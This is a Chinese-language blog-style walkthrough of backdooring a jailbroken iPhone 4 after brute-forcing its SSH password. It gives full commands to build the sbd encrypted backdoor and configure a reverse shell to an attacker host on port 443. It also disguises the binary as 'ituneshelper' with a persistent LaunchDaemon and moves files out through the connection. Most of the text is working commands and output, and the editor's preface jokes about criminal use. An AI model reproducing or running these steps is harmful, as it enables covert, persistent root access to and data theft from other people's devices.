小编:sbd是一款小型后门,且具有较强大的加密功能,是居家旅行杀人越货谋财害命之必备佳品(安全测试工具请勿非法使用),下载地址http://packetstormsecurity.org/files/download/34401/sbd-1.36.tar.gz

在一次安全渗透测试中,我通过ssh暴力破解拿到了一台iphone4(已越狱)的权限。于是我成功的SSH连接上这台设备,安装了一个持久的TCP反弹后门(sbd-1.36 by Michel Blomgren)

接下来来详细说明所有的步骤:

1. 安装iphone-gcc:

iphone4:~ root# uname -an
Darwin iphone4 11.0.0 Darwin Kernel Version 11.0.0: Tue Nov 1 20:33:58 PDT 2011; root:xnu-1878.4.46~1/RELEASE_ARM_S5L8930X iPhone3,1 arm N90AP Darwin

iphone4:~ root# apt-get update
Get:1 http://repo.biteyourapple.net ./ Release.gpg [490B]
Hit http://cydia.zodttd.com stable Release.gpg
Hit http://apt.saurik.com ios/675.00 Release.gpg
Hit http://repo.insanelyi.com ./ Release.gpg
...

iphone4:~ root# apt-get install iphone-gcc
Reading package lists... Done
Building dependency tree
Reading state information... Done
...
Setting up ldid (610-5) ...
Setting up com.sull.iphone-gccheaders (1.0-11) ...
Setting up com.sull.fake-libgcc (1.0-2) ...
Setting up iphone-gcc (4.2-20080604-1-8) ...

iphone4:~/sbd-1.36 root# apt-get install make
Reading package lists... Done
Building dependency tree
Reading state information... Done
...
Unpacking make (from .../make_3.81-2_iphoneos-arm.deb) ...
Setting up make (3.81-2) ...

2. 下载sbd后门:

iphone4:~ root# wget http://packetstorm.tacticalflex.com/UNIX/netcat/sbd-1.36.tar.gz
--2012-04-23 23:50:43-- http://packetstorm.tacticalflex.com/UNIX/netcat/sbd-1.36.tar.gz
Resolving packetstorm.tacticalflex.com... 173.160.180.156
Connecting to packetstorm.tacticalflex.com|173.160.180.156|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 84093 (82K) [application/x-gzip]
Saving to: `sbd-1.36.tar.gz'

100%[======================================>] 84,093 66.3K/s in 1.2s

2012-04-23 23:50:45 (66.3 KB/s) - `sbd-1.36.tar.gz' saved [84093/84093]

iphone4:~ root# tar -zxvf sbd-1.36.tar.gz
sbd-1.36/
sbd-1.36/sbd.c
sbd-1.36/doexec.c
sbd-1.36/pel.c
sbd-1.36/aes.c
sbd-1.36/sha1.c
sbd-1.36/socket_code.h
sbd-1.36/pel.h
sbd-1.36/aes.h
sbd-1.36/sha1.h
sbd-1.36/sbd.h
sbd-1.36/doexec_unix.h
sbd-1.36/doexec_win32.h
sbd-1.36/readwrite.h
sbd-1.36/misc.h
sbd-1.36/Makefile
sbd-1.36/mktarball.sh
sbd-1.36/README
sbd-1.36/COPYING
sbd-1.36/CHANGES
sbd-1.36/binaries/
sbd-1.36/binaries/sbd.exe
sbd-1.36/binaries/sbdbg.exe

iphone4:~ root# cd sbd-1.36
iphone4:~/sbd-1.36 root# ls -al
total 224
drwx------ 3 1000 100 748 Sep 17 2004 ./
drwxr-x--- 6 root wheel 272 Apr 23 23:50 ../
-rw------- 1 1000 100 1876 Sep 17 2004 CHANGES
-rw------- 1 1000 100 18007 Jun 8 2004 COPYING
-rw------- 1 1000 100 2176 Jun 20 2004 Makefile
-rw------- 1 1000 100 4880 Sep 11 2004 README
-rw------- 1 1000 100 31370 Jun 12 2004 aes.c
-rw------- 1 1000 100 549 Jun 11 2004 aes.h
drwx------ 2 1000 100 136 Sep 11 2004 binaries/
-rw------- 1 1000 100 77 Jun 2 2004 doexec.c
-rw------- 1 1000 100 7114 Sep 11 2004 doexec_unix.h
-rw------- 1 1000 100 19060 Sep 8 2004 doexec_win32.h
-rw------- 1 1000 100 14968 Sep 9 2004 misc.h
-rwx------ 1 1000 100 624 Jun 13 2004 mktarball.sh*
-rw------- 1 1000 100 13381 Sep 8 2004 pel.c
-rw------- 1 1000 100 898 Sep 9 2004 pel.h
-rw------- 1 1000 100 9829 Sep 9 2004 readwrite.h
-rw------- 1 1000 100 20557 Sep 9 2004 sbd.c
-rw------- 1 1000 100 2014 Jun 8 2004 sbd.h
-rw------- 1 1000 100 8900 Jun 2 2004 sha1.c
-rw------- 1 1000 100 436 Jun 2 2004 sha1.h
-rw------- 1 1000 100 20800 Sep 9 2004 socket_code.h

3. 在编译前配置Sbd(我把Sbd配置成了一个守护进程,所有的参数包括反弹IP、端口、密码、加密设置等等):

iphone4:~/sbd-1.36 root# cat sbd.h
#define SOURCE_PORT 0
#define CONVERT_TO_CRLF 0
#define ENCRYPTION 1
#define SHARED_SECRET "password"
#define QUIET 0
#define VERBOSE 0
#define DAEMONIZE 0
#define HIGHLIGHT_INCOMING 0
#define HIGHLIGHT_PREFIX "\x1b[0;32m"
#define HIGHLIGHT_SUFFIX "\x1b[0m"
#define SEPARATOR_BETWEEN_PREFIX_AND_DATA ": "
#define RUN_ONLY_ONE_INSTANCE 0
#define INSTANCE_SEMAPHORE "shadowinteger_bd_semaphore"

/* connect to 192.168.200.22 on port 443 (https) and serve /bin/bash.
* reconnect every 10 seconds.
*/

#define DOLISTEN 0
#define HOST "192.168.200.22"
#define PORT 443
#define RESPAWN_ENABLED 1
#define RESPAWN_INTERVAL 10
#define EXECPROG "/bin/bash"

然后你可以选择性的使用以下参数:
host: ./sbd -l -p 443 -k 1234
server: ./sbd -r 10 -q -e /bin/sh -c on -k 1234 -D on 192.168.200.22 443

4. 编译过程:

iphone4:~/sbd-1.36 root# make
usage:
make unix - Linux, NetBSD, FreeBSD, OpenBSD
make sunos - SunOS (Solaris)
make win32 - native win32 console app (w/ Cygwin + MinGW)
make win32bg - create a native win32 no-console app (w/ Cygwin + MinGW)
make win32bg CFLAGS=-DSTEALTH - stealthy no-console app
make mingw - native win32 console app (w/ MinGW MSYS)
make mingwbg - native win32 no-console app (w/ MinGW MSYS)
make cygwin - Cygwin console app
make darwin - Darwin

iphone4:~/sbd-1.36 root# make darwin
rm -f sbd sbd.exe *.o core
gcc -Wall -Wshadow -O2 -o sbd pel.c aes.c sha1.c doexec.c sbd.c
strip sbd

iphone4:~/sbd-1.36 root# ls -al sbd
-rwxr-xr-x 1 root 100 55296 Apr 24 02:10 sbd*

5. 配置守护进程 (为了持久)

iphone4:~/sbd-1.36 root# cp sbd /usr/bin/ituneshelper
iphone4:~/sbd-1.36 root# cd /Library/LaunchDaemons/
iphone4:/Library/LaunchDaemons root# ls -al
total 16
drwxr-xr-x 2 root wheel 136 Apr 24 02:02 ./
drwxrwxr-x 18 root admin 816 Dec 31 15:38 ../
-rw-r--r-- 1 root wheel 847 Feb 15 2011 com.openssh.sshd.plist
iphone4:/Library/LaunchDaemons root# cat << EOF >> com.ituneshelper.start.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.ituneshelper.start</string>
<key>ProgramArguments</key>
<array>
<string>/usr/bin/ituneshelper</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>StartInterval</key>
<integer>1</integer>
</dict>
</plist>
EOF
iphone4:/Library/LaunchDaemons root# ls -al
total 16
drwxr-xr-x 2 root wheel 136 Apr 24 02:15 ./
drwxrwxr-x 18 root admin 816 Dec 31 15:38 ../
-rw-r--r-- 1 root wheel 404 Apr 24 02:01 com.ituneshelper.start.plist
-rw-r--r-- 1 root wheel 847 Feb 15 2011 com.openssh.sshd.plist

6. 连接(from Linux box):

root@coresec:~# uname -an
Linux coresec 3.0.0-17-generic #30-Ubuntu SMP Thu Mar 8 20:45:39 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
root@coresec:~# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:03:72:5e
          inet addr:192.168.200.22  Bcast:192.168.200.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe03:725e/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:14741 errors:0 dropped:0 overruns:0 frame:0
          TX packets:10042 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:20159805 (20.1 MB)  TX bytes:720669 (720.6 KB)

root@coresec:/home/enzo/sbd-1.36# ./sbd -l -p 443 -k password
id
uid=0(root) gid=0(wheel) groups=0(wheel)
/bin/bash -i
bash: no job control in this shell
bash-4.0# ps -ef
UID PID PPID C STIME TTY TIME CMD
0 1 0 0 0:00.00 ?? 0:00.95 /sbin/launchd
0 19 1 0 0:00.00 ?? 0:00.95 /usr/libexec/UserEventAgent -l System
0 21 1 0 0:00.00 ?? 0:00.68 /usr/sbin/notifyd
0 23 1 0 0:00.00 ?? 0:00.41 /usr/sbin/syslogd
0 25 1 0 0:00.00 ?? 0:01.64 /usr/libexec/configd
25 27 1 0 0:00.00 ?? 0:01.53 /System/Library/Frameworks/CoreTelephony.framework/Support/CommCenterClassic
501 29 1 0 0:00.00 ?? 0:12.27 /System/Library/CoreServices/SpringBoard.app/SpringBoard
501 33 1 0 0:00.00 ?? 0:00.60 /System/Library/PrivateFrameworks/ManagedConfiguration.framework/Support/profiled
0 37 1 0 0:00.00 ?? 0:00.81 /usr/libexec/lockdownd
0 43 1 0 0:00.00 ?? 0:00.56 /System/Library/CoreServices/powerd.bundle/powerd
0 49 1 0 0:00.00 ?? 0:19.04 /usr/libexec/locationd
0 55 1 0 0:00.00 ?? 0:00.21 /usr/bin/sbsettingsd
0 56 1 0 0:00.00 ?? 0:00.69 /usr/sbin/wifid
501 58 1 0 0:00.00 ?? 0:00.46 /System/Library/PrivateFrameworks/Ubiquity.framework/Versions/A/Support/ubd
501 71 1 0 0:00.00 ?? 0:01.99 /usr/sbin/mediaserverd
501 72 1 0 0:00.00 ?? 0:00.13 /System/Library/PrivateFrameworks/MediaRemote.framework/Support/mediaremoted
65 73 1 0 0:00.00 ?? 0:00.27 /usr/sbin/mDNSResponder -launchd
501 75 1 0 0:00.00 ?? 0:00.87 /System/Library/PrivateFrameworks/IMCore.framework/imagent.app/imagent
501 76 1 0 0:00.00 ?? 0:00.45 /System/Library/PrivateFrameworks/IAP.framework/Support/iapd
0 78 1 0 0:00.00 ?? 0:00.13 /usr/libexec/fseventsd
501 79 1 0 0:00.00 ?? 0:00.92 /usr/sbin/fairplayd.N90
501 80 1 0 0:00.00 ?? 0:01.76 /System/Library/PrivateFrameworks/DataAccess.framework/Support/dataaccessd
501 86 1 0 0:00.00 ?? 0:00.45 /System/Library/PrivateFrameworks/ApplePushService.framework/apsd
501 87 1 0 0:00.00 ?? 0:00.34 /System/Library/PrivateFrameworks/AggregateDictionary.framework/Support/aggregated
501 92 1 0 0:00.00 ?? 0:00.39 /usr/sbin/BTServer
501 93 1 0 0:00.00 ?? 0:00.99 /usr/sbin/aosnotifyd
0 94 1 0 0:00.00 ?? 0:00.02 /usr/bin/ituneshelper
0 157 1 0 0:00.00 ?? 0:00.11 /usr/libexec/networkd
501 260 1 0 0:00.00 ?? 0:01.94 /Applications/MobileMail.app/MobileMail
501 261 1 0 0:00.00 ?? 0:00.75 /Applications/MobilePhone.app/MobilePhone
0 286 94 0 0:00.00 ?? 0:00.03 bash
0 300 286 0 0:00.00 ?? 0:00.03 /bin/bash -i
0 303 300 0 0:00.00 ?? 0:00.01 ps -ef

bash-4.0# uname -an
Darwin iphone4 11.0.0 Darwin Kernel Version 11.0.0: Tue Nov 1 20:33:58 PDT 2011; root:xnu-1878.4.46~1/RELEASE_ARM_S5L8930X iPhone3,1 arm N90AP Darwin

7. 如果你想与被控制的iphone间传送文件,你可以用以下参数使用sbd:

root@coresec:/home/enzo/sbd-1.36# sbd -l -p 12345 -k secret > output.file
 iphone4:~/sbd-1.36 root# cat /.../.../input.file | ./sbd -k secret 192.168.200.22 12345

8. 删除后门也很简单:

iphone4:/Library/LaunchDaemons root# rm -rf com.ituneshelper.start.plist
iphone4:/Library/LaunchDaemons root# rm -rf /usr/bin/ituneshelper
源链接

Hacking more

...